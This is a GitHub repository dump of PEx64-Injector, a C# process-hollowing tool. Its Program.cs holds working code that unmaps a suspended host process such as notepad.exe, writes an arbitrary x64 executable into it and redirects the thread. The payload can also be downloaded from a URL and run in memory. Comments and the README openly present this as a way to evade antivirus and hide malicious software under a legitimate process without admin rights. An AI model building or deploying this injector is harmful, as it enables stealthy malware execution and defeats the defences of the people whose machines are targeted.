Repository: 0xyg3n/PEx64-Injector
Branch: main
Commit: 88d93bb0654d
Files: 27
Total size: 17.4 KB
Directory structure:
gitextract_7e1nmr3i/
├── PEx64-Injector/
│ ├── App.config
│ ├── PEx64-Injector.csproj
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ ├── bin/
│ │ └── Debug/
│ │ ├── PEx64-Injector.exe.config
│ │ ├── PEx64-Injector.pdb
│ │ ├── big5.nlp
│ │ ├── bopomofo.nlp
│ │ ├── ksc.nlp
│ │ ├── normidna.nlp
│ │ ├── normnfc.nlp
│ │ ├── normnfd.nlp
│ │ ├── normnfkc.nlp
│ │ ├── normnfkd.nlp
│ │ ├── prc.nlp
│ │ ├── prcp.nlp
│ │ ├── sortkey.nlp
│ │ ├── sorttbls.nlp
│ │ └── xjis.nlp
│ └── obj/
│ └── Debug/
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Migrator.pdb
│ ├── PEx64-Injector.csproj.CopyComplete
│ ├── PEx64-Injector.csproj.CoreCompileInputs.cache
│ ├── PEx64-Injector.csproj.FileListAbsolute.txt
│ └── PEx64-Injector.csprojAssemblyReference.cache
├── PEx64-Injector.sln
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: PEx64-Injector/App.config
================================================
================================================
FILE: PEx64-Injector/PEx64-Injector.csproj
================================================
Debug
AnyCPU
{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}
Exe
PEx64_Injector
Migrator
v3.5
512
true
x64
true
full
false
bin\Debug\
prompt
4
true
x64
pdbonly
false
bin\Release\
prompt
4
PEx64_Injector.Program
================================================
FILE: PEx64-Injector/Program.cs
================================================
using System;
using System.IO;
using System.Net.Http;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
namespace PEx64_Injector
{
// Ensure unsafe code is enabled from build options.
public static class Migrate
{
// Special thanks to gigajew.
#region DllImport
[DllImport("kernel32.dll")]
private static extern bool CreateProcess(string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
byte[] lpStartupInfo,
byte[] lpProcessInformation);
[DllImport("kernel32.dll")]
private static extern long VirtualAllocEx(long hProcess,
long lpAddress,
long dwSize,
uint flAllocationType,
uint flProtect);
[DllImport("kernel32.dll")]
private static extern long WriteProcessMemory(long hProcess,
long lpBaseAddress,
byte[] lpBuffer,
int nSize,
long written);
[DllImport("ntdll.dll")]
private static extern uint ZwUnmapViewOfSection(long ProcessHandle,
long BaseAddress);
[DllImport("kernel32.dll")]
private static extern bool SetThreadContext(long hThread,
IntPtr lpContext);
[DllImport("kernel32.dll")]
private static extern bool GetThreadContext(long hThread,
IntPtr lpContext);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(long hThread);
[DllImport("kernel32.dll")]
private static extern bool CloseHandle(long handle);
#endregion
public static void Load(byte[] payloadBuffer, string host, string args)
{
int e_lfanew = Marshal.ReadInt32(payloadBuffer, 0x3c);
int sizeOfImage = Marshal.ReadInt32(payloadBuffer, e_lfanew + 0x18 + 0x038);
int sizeOfHeaders = Marshal.ReadInt32(payloadBuffer, e_lfanew + 0x18 + 0x03c);
int entryPoint = Marshal.ReadInt32(payloadBuffer, e_lfanew + 0x18 + 0x10);
short numberOfSections = Marshal.ReadInt16(payloadBuffer, e_lfanew + 0x4 + 0x2);
short sizeOfOptionalHeader = Marshal.ReadInt16(payloadBuffer, e_lfanew + 0x4 + 0x10);
long imageBase = Marshal.ReadInt64(payloadBuffer, e_lfanew + 0x18 + 0x18);
byte[] bStartupInfo = new byte[0x68];
byte[] bProcessInfo = new byte[0x18];
IntPtr pThreadContext = Allocate(0x4d0, 16);
string targetHost = host;
if (!string.IsNullOrEmpty(args))
targetHost += " " + args;
string currentDirectory = Directory.GetCurrentDirectory();
Marshal.WriteInt32(pThreadContext, 0x30, 0x0010001b);
CreateProcess(null, targetHost, IntPtr.Zero, IntPtr.Zero, true, 0x4u, IntPtr.Zero, currentDirectory, bStartupInfo, bProcessInfo);
long processHandle = Marshal.ReadInt64(bProcessInfo, 0x0);
long threadHandle = Marshal.ReadInt64(bProcessInfo, 0x8);
ZwUnmapViewOfSection(processHandle, imageBase);
VirtualAllocEx(processHandle, imageBase, sizeOfImage, 0x3000, 0x40);
WriteProcessMemory(processHandle, imageBase, payloadBuffer, sizeOfHeaders, 0L);
for (short i = 0; i < numberOfSections; i++)
{
byte[] section = new byte[0x28];
Buffer.BlockCopy(payloadBuffer, e_lfanew + (0x18 + sizeOfOptionalHeader) + (0x28 * i), section, 0, 0x28);
int virtualAddress = Marshal.ReadInt32(section, 0x00c);
int sizeOfRawData = Marshal.ReadInt32(section, 0x010);
int pointerToRawData = Marshal.ReadInt32(section, 0x014);
byte[] bRawData = new byte[sizeOfRawData];
Buffer.BlockCopy(payloadBuffer, pointerToRawData, bRawData, 0, bRawData.Length);
WriteProcessMemory(processHandle, imageBase + virtualAddress, bRawData, bRawData.Length, 0L);
}
GetThreadContext(threadHandle, pThreadContext);
byte[] bImageBase = BitConverter.GetBytes(imageBase);
long rdx = Marshal.ReadInt64(pThreadContext, 0x88);
WriteProcessMemory(processHandle, rdx + 16, bImageBase, 8, 0L);
Marshal.WriteInt64(pThreadContext, 0x80 /* rcx */, imageBase + entryPoint);
SetThreadContext(threadHandle, pThreadContext);
ResumeThread(threadHandle);
Marshal.FreeHGlobal(pThreadContext);
CloseHandle(processHandle);
CloseHandle(threadHandle);
}
private static IntPtr Align(IntPtr source, int alignment)
{
long source64 = source.ToInt64() + (alignment - 1);
long aligned = alignment * (source64 / alignment);
return new IntPtr(aligned);
}
private static IntPtr Allocate(int size, int alignment)
{
IntPtr allocated = Marshal.AllocHGlobal(size + (alignment / 2));
return Align(allocated, alignment);
}
}
// added new feature, download the executable from url in order to evade detection.
class Program
{
static async Task Main(string[] args)
{
try
{
if (args.Length < 2)
{
Console.WriteLine("\n\n[*] Developed By 0xyg3n\n\n[!] Invalid Arguments Specified..\n\n[*] Usage: Migrator.exe payload(fpath or URL) migratefile(fpath)\n\n[*] Example: Migrator.exe C:\\Users\\User\\Desktop\\Putty64.exe C:\\Windows\\System32\\notepad.exe\n[*] Example: Migrator.exe https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe C:\\Windows\\System32\\notepad.exe\n\n");
Environment.Exit(0);
}
else
{
// The file you want to inject (payload).
string payload = args[0];
// The executable you want to inject to (hostfile).
string migratefile = args[1];
byte[] payloadData;
// Check if the payload is a URL or a file path
if (Uri.IsWellFormedUriString(payload, UriKind.Absolute))
{
// Download the file directly into memory
payloadData = await DownloadFileAsync(payload);
Console.WriteLine("[*] Downloaded payload from URL.");
}
else
{
// Read the payload from the file
payloadData = File.ReadAllBytes(payload);
Console.WriteLine("[*] Loaded payload from file.");
}
string arguments = ""; // Arguments can be added if needed.
Migrate.Load(payloadData, migratefile, arguments);
Console.WriteLine("\n\n[*] Migrated Successfully!");
}
}
catch (Exception ex)
{
Console.WriteLine("\n\n[*] Migration Failed: " + ex.Message);
}
}
static async Task DownloadFileAsync(string url)
{
using (HttpClient client = new HttpClient())
{
// Send a GET request
HttpResponseMessage response = await client.GetAsync(url);
response.EnsureSuccessStatusCode(); // Throw if not a success code.
// Read the response content as a byte array
return await response.Content.ReadAsByteArrayAsync();
}
}
}
}
================================================
FILE: PEx64-Injector/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Migrator")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Migrator")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("9b7c391a-64df-4ac0-b9a2-ccff85c13c26")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: PEx64-Injector/bin/Debug/PEx64-Injector.exe.config
================================================
================================================
FILE: PEx64-Injector/obj/Debug/PEx64-Injector.csproj.CopyComplete
================================================
================================================
FILE: PEx64-Injector/obj/Debug/PEx64-Injector.csproj.CoreCompileInputs.cache
================================================
f46e055aec20c3162c4322410157d7c3b875bf13
================================================
FILE: PEx64-Injector/obj/Debug/PEx64-Injector.csproj.FileListAbsolute.txt
================================================
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\mscorlib.dll
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\el\mscorlib.resources.dll
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\sortkey.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\sorttbls.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\big5.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\bopomofo.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\ksc.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\prc.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\prcp.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\xjis.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\normidna.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\normnfc.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\normnfd.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\normnfkc.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\normnfkd.nlp
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\obj\Debug\PEx64-Injector.csprojAssemblyReference.cache
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\obj\Debug\PEx64-Injector.csproj.CoreCompileInputs.cache
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\obj\Debug\PEx64-Injector.csproj.CopyComplete
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\Migrator.exe.config
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\Migrator.exe
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\bin\Debug\Migrator.pdb
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\obj\Debug\Migrator.exe
C:\Users\dev\Downloads\PEx64-Injector-main\PEx64-Injector-main\PEx64-Injector\obj\Debug\Migrator.pdb
================================================
FILE: PEx64-Injector.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30517.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PEx64-Injector", "PEx64-Injector\PEx64-Injector.csproj", "{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9B7C391A-64DF-4AC0-B9A2-CCFF85C13C26}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {6AF2CB4F-B286-4111-A866-D6112C476488}
EndGlobalSection
EndGlobal
================================================
FILE: README.md
================================================
> # PEx64-Injector (Process Migrator) + Download Execute In Memory [Updated 23/10/2024]
> #### Inject any x64 exe to any x64 process ~~(Net FrameWork 3.5)~~ Upgraded to : Net FrameWork 4.7.2 Directly from the Internet or Locally, without touching the disk.
> #### No Administrator privileges required.
> ##### GIF Demo
> 
> ### How can be used?
> 
> #### Download [here](https://github.com/0xyg3n/PEx64-Injector/releases/tag/1.0).
> #### Usage: Migrator.exe "localfilePath(Lpath)" or "direct URL" "Legitfile(fpath)"
> #### Usage Example: 1. Migrator.exe "C:\Users\User\Desktop\Putty64.exe" "C:\Windows\System32\notepad.exe"
> #### Usage Example: 2. Migrator.exe "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe" "C:\Windows\System32\notepad.exe"
> #### Keep as a note that when you specify the migratefile it will launch as a new process and won't migrate to an already running process.
> #### Such tool can be utilized for AV evasion, masking malicious software under legitimate process.
###### Special thanks to [GigaJew](https://github.com/gigajew/).
______________________